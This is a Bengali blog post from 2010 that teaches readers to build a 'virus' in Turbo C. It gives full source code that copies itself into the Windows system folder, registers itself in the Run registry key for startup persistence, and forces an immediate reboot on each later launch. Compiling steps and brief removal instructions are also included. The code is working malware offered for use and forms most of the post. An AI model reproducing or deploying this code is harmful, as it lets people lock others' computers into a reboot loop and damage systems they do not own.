জোস একটা ভাইরাস বানিয়ে ফেলুন , সমাধান সহ

Posted: জুলাই 5, 2010 in প্রোগ্রামিং
Tags: , ,

লিখেছেনঃ একলা পথিক

এবার তৈরী করুন ভাইরাস যা কম্পিউটার বার বার রিষ্টাট করতে বাধ্য করবে ।
খুবই সোজা , প্রোগ্রামিং ল্যাঙ্গুয়েজ সি ওপেন করে নিচের কোডটি টাইপ করুন ।

জোস একটা ভাইরাস বানিয়ে ফেলুন

প্রোগ্রামিং ল্যাঙ্গুয়েজ সি না থাকলে এখান থেকে সি ডাউনলোড করুন

এবং সেটাপ দিতে ডাবল ক্লিক করার পর Unzip এ ক্লিক করুন । ব্যস কম্পিলিট ।
এরপর C ড্রাইভের ভিতরে গিয়ে TC তারপর BIN এ যান । সর্বশেষে TC তে ক্লিক করে C ওপেন করুন এবং কোডগুলো টাইপ করুন । উপরের মেন্যুতে গিয়ে Save as এ ক্লিক করে ফাইলের নাম Sysres.C লিখুন ।

#include<stdio.h>
#include<dos.h>
#include<dir.h>

int found,drive_no;char buff[128];

void findroot()
{
int done;
struct ffblk ffblk; //File block structure
done=findfirst(“C:\\windows\\system”,&ffblk,FA_DIREC); //to determine the root drive
if(done==0)
{
done=findfirst(“C:\\windows\\system\\sysres.exe”,&ffblk,0); //to determine whether the virus is already installed or not
if(done==0)
{
found=1; //means that the system is already infected
return;
}
drive_no=1;
return;
}
done=findfirst(“D:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“D:\\windows\\system\\sysres.exe”,&ffblk,0);
if
(done==0)
{
found=1;return;
}
drive_no=2;
return;
}
done=findfirst(“E:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“E:\\windows\\system\\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=3;
return;
}
done=findfirst(“F:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“F:\\windows\\system\\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=4;
return;
}
else
exit(0);
}

void main()
{
FILE *self,*target;
findroot();
if(found==0) //if the system is not already infected
{
self=fopen(_argv[0],”rb”); //The virus file open’s itself
switch(drive_no)
{
case 1:
target=fopen(“C:\\windows\\system\\sysres.exe”,”wb”); //to place a copy of itself in a remote place
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
C:\\windows\\system\\ sysres.exe”); //put this file to registry for starup
break;

case 2:
target=fopen(“D:\\windows\\system\\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
D:\\windows\\system\\sysres.exe”);
break;

case 3:
target=fopen(“E:\\windows\\system\\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
E:\\windows\\system\\sysres.exe”);
break;

case 4:
target=fopen(“F:\\windows\\system\\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
F:\\windows\\system\\sysres.exe”);
break;

default:
exit(0);
}

while(fread(buff,1,1,self)>0)
fwrite(buff,1,1,target);
fcloseall();
}

else
system(“shutdown -r -t 0″); //if the system is already infected then just give a command to restart
}

সেভ করার পর কম্পাইল করার জন্য Alt-F9 প্রেস করুন । কম্পাইল হয়ে গেলে F9 প্রেস করুন EXE ফাইলকে জেনারেট করার জন্য । আর ইরর দেখালে কোডটি ভালভাবে চেক করুন।
সাবধান CTRL-F9 প্রেস করবেন না । তাহলে ফাইলটি আপনার পিসিতেই রান হয়ে যাবে ।
পুনরায় কম্পাইল করুন এবং EXE ফাইলটি জেনারেট করুন । ব্যস তৈরী হয়ে Sysres.exe এপ্লিকেশন ।
Sysres.exe ফাইলটি সধারনত c:\tc\bin এই তৈরী হবে ।

টেষ্ট করুন:

Sysres.exe ফাইলটিতে ক্লিক করে টেষ্ট করে দেখতে পারেন ।

এবার রিমুভ করুন আপনার কম্পিউটার থেকে:

আপনার কম্পিউটার প্রথমে সেভ মুডে ওপেন করুন এখন সিস্টেম ড্রাইভে প্রবেশ করুন । X:\Windows\System
(X can be C,D,E or F)

অতঃপর sysres.exe এই ফাইলটি খুঁজে বের করুন এবং ডিলিট করুন ।
Run এ গিয়ে regedit টাইপ করুন , registry editor এ গিয়ে HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Run এখানে প্রবেশ করুন ।

এখন আপনি sres নামে আরেকটি ফাইল দেখতে পারবেন , এটিও ডিলিট করুন এবং আপনার পিসিকে Sysres.exe হতে পুরোপুরি মুক্ত করুন ।

Source

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / পরিবর্তন )

Twitter picture

You are commenting using your Twitter account. Log Out / পরিবর্তন )

Facebook photo

You are commenting using your Facebook account. Log Out / পরিবর্তন )

Google+ photo

You are commenting using your Google+ account. Log Out / পরিবর্তন )

Connecting to %s